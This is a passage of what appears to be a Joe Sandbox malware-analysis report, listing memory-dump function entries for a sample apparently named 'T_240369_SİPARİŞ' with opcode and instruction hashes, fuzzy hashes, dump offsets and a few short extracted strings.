                                                                        • Instruction Fuzzy Hash: 5301B131F102551FDB6196ADD814B5BBBEADBCA724F14843AE00ED7392EE25DC428392
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c95618913b15bf0b00fe675fb69fde7bcb80c9b9b04da01938ab9332430a6d24
                                                                        • Instruction ID: 400b73de65ed8ba0a5f3f07f44d2c1f9cc7a44e64c707b1758043b952e7913a5
                                                                        • Opcode Fuzzy Hash: c95618913b15bf0b00fe675fb69fde7bcb80c9b9b04da01938ab9332430a6d24
                                                                        • Instruction Fuzzy Hash: CE01F535F011048FDF58DBB8D5946AFB7E6EB88211F21887AE90ADB351EA31C901C781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d1a81779c66acf475dd12bb298dc2b63191c014e7aa1f17d5f41c2f6d1526b17
                                                                        • Instruction ID: fcf68c5f239db1b2ebf8de8e25a974f026acd02723b91d6d584513a7cecbcac8
                                                                        • Opcode Fuzzy Hash: d1a81779c66acf475dd12bb298dc2b63191c014e7aa1f17d5f41c2f6d1526b17
                                                                        • Instruction Fuzzy Hash: 2B21EFB1D00259ABCB00CF9AD884ACEFBB4FB48324F10822AE918B7340D374A544CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c1a30cc32be2b84bf3c078307905635046d2da429ad523abe8b79b3c6fe770f
                                                                        • Instruction ID: 0f676722869cd3a51accf7b6fcf384d9c67383c477bbd55624d8179d25daa713
                                                                        • Opcode Fuzzy Hash: 0c1a30cc32be2b84bf3c078307905635046d2da429ad523abe8b79b3c6fe770f
                                                                        • Instruction Fuzzy Hash: 5B01D431F001105FCB51D77CD955B2E77E6DBCA714F148866E40ECB352DA26DC164786
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 861b0a140d2aec32e5381ec8e454bc1371ec2c82ed325a1953ca1701e7d18841
                                                                        • Instruction ID: d0ac1c93e9ced15773438eb6c6e55bdf206a9d53548b30a96e88334e1a6de733
                                                                        • Opcode Fuzzy Hash: 861b0a140d2aec32e5381ec8e454bc1371ec2c82ed325a1953ca1701e7d18841
                                                                        • Instruction Fuzzy Hash: 3C01F576F200649BDB54D678ED156AE76EADBC8612F040536D40AE7384EF20DD039382
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4086386751.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_10bd000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                        • Instruction ID: 506273fc007f28dfddb54e271b2c15f280ad5d53a4e85b378a8d3afb451926cf
                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                        • Instruction Fuzzy Hash: 5411D075504244DFDB12CF54C5C4B55FFA1FB44318F24CAA9E9894B256C33AD44ACF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e6e74abfeb00327b15dfbbb4ea18631454e7e15ff6f15bd8e4be2045f49c9cd
                                                                        • Instruction ID: 0e3d7d1071220710deffcb92a592a889425d3d39cc6a2d7a26c1b0679693477f
                                                                        • Opcode Fuzzy Hash: 3e6e74abfeb00327b15dfbbb4ea18631454e7e15ff6f15bd8e4be2045f49c9cd
                                                                        • Instruction Fuzzy Hash: DB11CFB5D01259AFCB00CF9AD884ADEFBB4FB48324F10812AE918B7340D374A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 508298843669773c1fade92ac5060d6574c3db3d682f2ce7b26a34d65e5de931
                                                                        • Instruction ID: 3d811d9e91ff10d65cfb953c0e917d98fcf9e7272140f15c4992897a80f0049f
                                                                        • Opcode Fuzzy Hash: 508298843669773c1fade92ac5060d6574c3db3d682f2ce7b26a34d65e5de931
                                                                        • Instruction Fuzzy Hash: 4001DC30B101191BDB6496ADD814B2FA6DADBCA724F20883AE00ED7380DE21DC424395
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f739b6131ac2257498f55cc497c446724b0a7faf76de53898f3e9e274d78788a
                                                                        • Instruction ID: eef9718153f813fb29a47a1c669d8b44015e0a5acee3362633dba35b56c32102
                                                                        • Opcode Fuzzy Hash: f739b6131ac2257498f55cc497c446724b0a7faf76de53898f3e9e274d78788a
                                                                        • Instruction Fuzzy Hash: B301BC30F142059FCB61DAB8D461A1FB7E5EB8A624F108429E00ACB395EE25DC418781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f81bcdca648661b195f7566a5b75bc43b02c2c19dfc84c996b45785ffe51149e
                                                                        • Instruction ID: 1b67955d253e7f99bb199344b145d812bae4f9300d45dbbd40fc3f68222d9f95
                                                                        • Opcode Fuzzy Hash: f81bcdca648661b195f7566a5b75bc43b02c2c19dfc84c996b45785ffe51149e
                                                                        • Instruction Fuzzy Hash: 9301FF31F000145BCB64967DE854B2F63DADBCAB20F108839E10ECB340EE66DC064385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 629e273ca9dad346cb0fe7cef36c1f516d67fe369543e476f26b4f1bd3195c37
                                                                        • Instruction ID: c502448b1d8130a1dffd66bfede9958005e9d8893b0f7f09ff2c531fe6d94218
                                                                        • Opcode Fuzzy Hash: 629e273ca9dad346cb0fe7cef36c1f516d67fe369543e476f26b4f1bd3195c37
                                                                        • Instruction Fuzzy Hash: 8C018130F105155BDB60DABCD555B1F73D5E789724F108428E10AC7344EE21DC418781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 696137b2908e62881f39c0a05f5e83c9832534cbbf1ca6a09a2070f9d617d471
                                                                        • Instruction ID: e55bb9a27126bd3a60902da9e0436223077f1f81663a0dc968477205644558c7
                                                                        • Opcode Fuzzy Hash: 696137b2908e62881f39c0a05f5e83c9832534cbbf1ca6a09a2070f9d617d471
                                                                        • Instruction Fuzzy Hash: C7E08071D155489BDF90CAB0DB1535B77A5E702204F24C9B6C41DC7341F236CE05E740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b18360c445daeed6c0431c8d2255b4635347293db7de6383a2d9fac2eca7d1b
                                                                        • Instruction ID: a312dbbdafafc2573af75f2cca82ad1a6bf6498d0da78413620d55c48623ee95
                                                                        • Opcode Fuzzy Hash: 5b18360c445daeed6c0431c8d2255b4635347293db7de6383a2d9fac2eca7d1b
                                                                        • Instruction Fuzzy Hash: C4E01271E1410CABDF60DEB4D95575BB7ADE702214F20C4A9D419C7305E676DA41D780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2222239885
                                                                        • Opcode ID: 7621460350810f7aff48cc233041340b2bb44983392c89b874e2651a1599ed0a
                                                                        • Instruction ID: ccbe6450bcd1354abb565dc501035451e3ad5281ef6ffe161d82ed451760cc46
                                                                        • Opcode Fuzzy Hash: 7621460350810f7aff48cc233041340b2bb44983392c89b874e2651a1599ed0a
                                                                        • Instruction Fuzzy Hash: C2120E30E006198FDB68DF65C954AAEBBF2BF88704F2085A9D509AB354DB31DD85CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-3823777903
                                                                        • Opcode ID: a6fb993cf74ad7eec6dd5832ef7ddee354a3293214762e4b3b53e48c412ad132
                                                                        • Instruction ID: 5e8d8c89cba9b58c3ec6d3b6aa934af78ade544a9d15095210cd2632cb19cf23
                                                                        • Opcode Fuzzy Hash: a6fb993cf74ad7eec6dd5832ef7ddee354a3293214762e4b3b53e48c412ad132
                                                                        • Instruction Fuzzy Hash: 93916F30E10209EFDB68DFA5D654BAEB7F2BF84705F208529E4019B394DB359D45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-390881366
                                                                        • Opcode ID: c48d86f35d116a1e20d6d811cac7390473c78ef48f15398bfb037ef051cf19e7
                                                                        • Instruction ID: 8b99dd9024ad45d0fe84ca33d5ababff9beeea5edf92c9ae2281c2525fec3df6
                                                                        • Opcode Fuzzy Hash: c48d86f35d116a1e20d6d811cac7390473c78ef48f15398bfb037ef051cf19e7
                                                                        • Instruction Fuzzy Hash: 99F13E30B00209CFDB59EF69D654A5EBBB2FF88704F248568D4059B7A8DB35ED86CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2125118731
                                                                        • Opcode ID: 916fd0b91331dbee1c0b319123d0a9ef4b6dbfd84a9501a85b18ca6051ca2404
                                                                        • Instruction ID: e9f19f6adec36e116fb30edbe637ce4a2865712808ae088b7afea3fa7c5e1550
                                                                        • Opcode Fuzzy Hash: 916fd0b91331dbee1c0b319123d0a9ef4b6dbfd84a9501a85b18ca6051ca2404
                                                                        • Instruction Fuzzy Hash: FBB12D30A102098FDB58DF69D594A9EB7B2BF88304F24893DD406DB399DB75DC86CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LR^q$LR^q$$^q$$^q
                                                                        • API String ID: 0-2454687669
                                                                        • Opcode ID: da0dd9e77e447b27d0fe7fb585efc763eb29cf596666876ff22c7c323ea69a97
                                                                        • Instruction ID: 3e1c586e7ca5429f467f19390c03343ed26d34ce185c70489d9027b1bfa0b430
                                                                        • Opcode Fuzzy Hash: da0dd9e77e447b27d0fe7fb585efc763eb29cf596666876ff22c7c323ea69a97
                                                                        • Instruction Fuzzy Hash: 9151B330B002059FDB58EB68D948A6AB7E6FF88304F14896DE4059F3A9DF30EC45CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2125118731
                                                                        • Opcode ID: 83b9fd0335c4de91895f7a46194e01a962b91db8f2d21bf44ea64f12683a6abb
                                                                        • Instruction ID: 90b7aef7414cbbb878b0488f2609fa638eae0929866234d8daa995d2f3a58753
                                                                        • Opcode Fuzzy Hash: 83b9fd0335c4de91895f7a46194e01a962b91db8f2d21bf44ea64f12683a6abb
                                                                        • Instruction Fuzzy Hash: C0518031E102098FDF69DBA4D580AAEB7B2FF88715F148529E805EB355DB35DC42CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%